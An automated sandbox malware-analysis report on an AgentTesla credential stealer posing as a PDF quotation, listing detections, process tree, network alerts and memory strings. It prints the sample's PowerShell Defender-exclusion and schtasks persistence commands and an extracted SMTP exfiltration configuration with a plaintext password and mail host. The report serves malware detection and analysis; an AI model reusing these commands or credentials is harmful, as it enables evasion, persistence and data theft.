Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UN-Quotation 70000000187366444_PDF.exe

Overview

General Information

Sample Name:UN-Quotation 70000000187366444_PDF.exe
Analysis ID:652379
MD5:0bfb0ab1e8c7ec929e44d70c196b4d21
SHA1:89c971ae9a832cdfe2e56e8adfe9972505059c2c
SHA256:cae7db67ae977f3f41349954ecedd51d0248924012fbcb33610e44ced5f24611
Tags:Agentteslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • UN-Quotation 70000000187366444_PDF.exe (PID: 6220 cmdline: "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe" MD5: 0BFB0AB1E8C7EC929E44D70C196B4D21)
    • powershell.exe (PID: 6608 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6712 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6780 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "giedre@bonsa.lt", "Password": "201Bon@22", "Host": "mail.bonsa.lt"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          0000000A.00000000.294076711.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x32b1e:$s10: logins
                • 0x32585:$s11: credential
                • 0x2eb6e:$g1: get_Clipboard
                • 0x2eb7c:$g2: get_Keyboard
                • 0x2eb89:$g3: get_Password
                • 0x2fe80:$g4: get_CtrlKeyDown
                • 0x2fe90:$g5: get_ShiftKeyDown
                • 0x2fea1:$g6: get_AltKeyDown
                10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    Click to see the 31 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:192.168.2.3193.46.84.142497415872840032 06/26/22-09:22:47.581294
                    SID:2840032
                    Source Port:49741
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3193.46.84.142497415872030171 06/26/22-09:22:47.581243
                    SID:2030171
                    Source Port:49741
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3193.46.84.142497415872851779 06/26/22-09:22:47.581294
                    SID:2851779
                    Source Port:49741
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for submitted file
                    Source: UN-Quotation 70000000187366444_PDF.exeVirustotal: Detection: 37%Perma Link
                    Source: UN-Quotation 70000000187366444_PDF.exeReversingLabs: Detection: 19%
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\XrgnLg.exeReversingLabs: Detection: 19%
                    Machine Learning detection for sample
                    Source: UN-Quotation 70000000187366444_PDF.exeJoe Sandbox ML: detected
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\XrgnLg.exeJoe Sandbox ML: detected
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                    Source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "giedre@bonsa.lt", "Password": "201Bon@22", "Host": "mail.bonsa.lt"}
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49741 -> 193.46.84.142:587
                    Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49741 -> 193.46.84.142:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49741 -> 193.46.84.142:587
                    Source: global trafficTCP traffic: 192.168.2.3:49741 -> 193.46.84.142:587
                    Source: global trafficTCP traffic: 192.168.2.3:49741 -> 193.46.84.142:587
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253180685.0000000005584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.w
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248676313.0000000005584000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248638895.0000000005584000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248610040.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248610040.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.comH:
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lAnHfH.com
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514166896.000000000312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.bonsa.lt
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252757829.0000000005582000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253010678.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com.HB
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com:
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252757829.0000000005582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comQ
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252961183.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253010678.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coma
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comn-u
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252757829.0000000005582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comn-uFi
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252856921.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252961183.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253010678.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253046638.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.como.
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252856921.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.como.HB
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252961183.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comue4B
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comv
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260487275.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257449014.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260217118.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260045634.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.259916089.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers#
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260217118.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260274303.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260045634.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers)8
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257449014.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257348457.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258973602.00000000055C4000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258918421.00000000055C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.267126818.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257743913.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257514571.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257563714.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers48
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258212354.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258149553.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258050880.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258267258.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersC8
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258212354.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257985084.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258149553.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258050880.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258267258.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designerss
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalic
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comals
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcomF
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcomd
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.295386008.0000000005580000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303672867.0000000005580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.commsd
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251459375.00000000055BD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251524303.00000000055BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn#
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251813901.000000000558B000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251689579.0000000005585000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251729621.0000000005587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/jBu
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251524303.00000000055BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn8OX
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.263325743.000000000558C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.krfk6
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.247789916.000000000559B000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.247789916.000000000559B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comY
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krcom
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krim
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251850802.0000000005582000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251729621.0000000005587000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251932047.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251813901.000000000558B000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251729621.0000000005587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comNorm
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248734873.0000000005584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.net8bX
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248734873.0000000005584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netiv
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252502935.000000000558A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252502935.000000000558A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnn-u
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252856921.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252502935.000000000558A000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnue4B
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%%startupfolder%
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514197510.000000000313C000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514154750.0000000003129000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514166896.000000000312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oVr11J0CkkX1DVO37.net
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownDNS traffic detected: queries for: mail.bonsa.lt

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
